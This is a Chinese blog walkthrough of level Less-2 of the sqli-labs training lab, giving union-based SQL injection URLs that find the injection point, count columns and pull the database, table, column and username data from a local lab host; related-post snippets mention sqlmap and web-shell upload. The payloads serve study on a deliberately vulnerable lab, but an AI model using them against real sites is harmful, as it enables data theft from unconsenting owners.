【SQLI-Lab】-Less2

最新推荐文章于 2024-03-03 17:42:51 发布
最新推荐文章于 2024-03-03 17:42:51 发布
阅读量285 收藏 1
点赞数
分类专栏: sqli 漏洞注入通关宝典 文章标签: 渗透测试 mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/112972869
版权

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

前言

一、GET整型(数字型)注入

执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。

二、步骤

通过报错判断类型和闭合

http://192.168.135.149/sqli/Less-2/?id=1'

在这里插入图片描述

进一步查看回显

http://192.168.135.149/sqli/Less-2/?id=1 and 1=1 -- 1

在这里插入图片描述

发现存在注入点

http://192.168.135.149/sqli/Less-2/?id=1 and 1=2 -- 1

在这里插入图片描述

判断列数

http://192.168.135.149/sqli/Less-2/?id=1 group by 3 -- 1

在这里插入图片描述

爆库名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,database(),3 -- 1

在这里插入图片描述
爆表名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1

在这里插入图片描述

爆列名payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+

在这里插入图片描述

爆username列的数据值payload

http://192.168.135.149/sqli/Less-2/?id=-1 union select 1,(select group_concat(`username`) from security.users),3 -- 1

在这里插入图片描述

总结

整型(数字型)不用注意符号闭合,故意报错看是否在外部成功闭合,即可明确整型(数字型),即正常输入语句即可成功查询。

幸运之河
关注
专栏目录
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 863
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1420
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs less 2
weixin_34175509的博客
08-11 119
Less-2 将'(单引号)添加到数字中。 我们又得到了一个Mysql返回的错误,提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...
sqli-lab教程Less-2
Brucye
03-23 296
less-1 sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)出库表字段拿到字段值。 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select column_name
sqli-lab 学习记录less2
qq_43677324的博客
03-16 257
sqli-lab 学习记录less2 less2 1.我们先来判断这次的sql注入类型 我们输入 ?id=1 ?id=1' 发现第一个语句返回正确 但是第二个却有了报错 我们因此可以判断 这次的sql注入类型为数字类型 2. 之后和less1一样 我们进行暴表的名字(暴表) 我们输入 ?id=0 union select 1,group_concat(table_name),3 from inf...
sqli-lab刷题Less-2
MichealCurry1的博客
10-05 105
Less-2为双引号注入型,与Less-1相差不大,详情查看sqli-lab刷题Less-2 打开sqli-lab,在网站输入?id=1' 出现'' LIMIT 0,1'的报错,去掉LIMIT 0,1'原本sql语句就有的字符,出现两个'',说明1后面多了一个单引号 输入?id=1 and 1=2 union select 1,2,3 --+出现下述现象,说明注入点为2,3字段,接下来的操作与Less-1相同,(需要查看请点击这里),不再赘述。 ...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1874
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1225
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
SQL联合注入详解-结合SQLi-lab less1
weixin_45118086的博客
07-09 323
SQL注入详解 首先看一看能不能注入 127.0.0.1/sqli-labs/Less-1/?id=1 order by 3 --+ 发现输入多少都不报错 所以推测应该是字符注入 通过以下两句,判断出字段数为3(order by 4报错) 127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ 127.0.0.1/sqli-labs/Less-1/?id=1' order by 4 --+ 看一下注入点 127.0.0.1/sqli-labs/Less-1/?id=
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
最新发布
m0_73615178的博客
03-03 1084
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 201
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
sqli-lab 闯关教程 Less-2
羽路星尘的博客
10-26 179
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
sqli靶场通关之less2
sunxueer的博客
07-15 447
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字型SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 数据库名 id=1 and 1=2 union select 1,
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 269
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1642
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
mysql less2_Sqli labs系列-less-2 详细篇
weixin_39941792的博客
02-02 85
就今天晚上一个小插曲,瞬间感觉我被嘲讽了。SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊。。。好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比。。。好了,不扯了,现在开始扯这...
通过sqli-labs-master第二关完成木马上传
快递小哥的博客
01-08 440
写入一句话木马条件 一.写权限 写文件 Into Outfile into Dumpfile 二.需要知道网站绝对路径 如何确定网站绝对路径 @@basedir @@datadir 1.判断注入漏洞,是数值型注入 2.判断显示位之后,...
sqli-libs————Less2(数字型注入)
Fly_鹏程万里
05-08 1198
Less2同样,我们根据提示传入参数id,数据类型为numeric加入单引号进行测试:出错误提示信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' ...
sqli_lab(less1-10)解题方法
weixin_43952190的博客
07-19 391
GET注入 less1: ?id=1’ #报错 ?id=1’ and 1=1–+ #正常 ?id=1’ and 1=2–+ #语句正常但返回异常 ?id=1’ order by 3–+ #正常 ?id=-1’ union select 1,2,3–+ #2为显示位 ?id=-1’ union select 1,group_concat(schema_name),3, from information_schema.schemata–+ ?id=-1’
sqli-lab安装
09-05
2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值